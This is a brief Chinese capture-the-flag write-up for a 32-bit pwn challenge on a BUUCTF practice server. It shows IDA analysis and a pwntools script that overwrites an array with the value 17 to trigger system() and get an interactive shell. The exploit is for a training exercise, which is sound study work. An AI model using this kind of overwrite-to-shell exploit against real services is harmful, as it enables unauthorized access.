一、查看文件


32位,开启了Canary保护。
二、IDA反编译
啥也不清楚,就老办法,拖入IDA进行反编译:

感觉主函数中给的线索比较清晰,系统调用函数就在主函数中,看带代码是当var[13]==17LL时候执行system函数。
所以我们可以把17填充进去
三、代码
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25456)
p=p32(17)*14
r.sendline(p)
r.interactive()


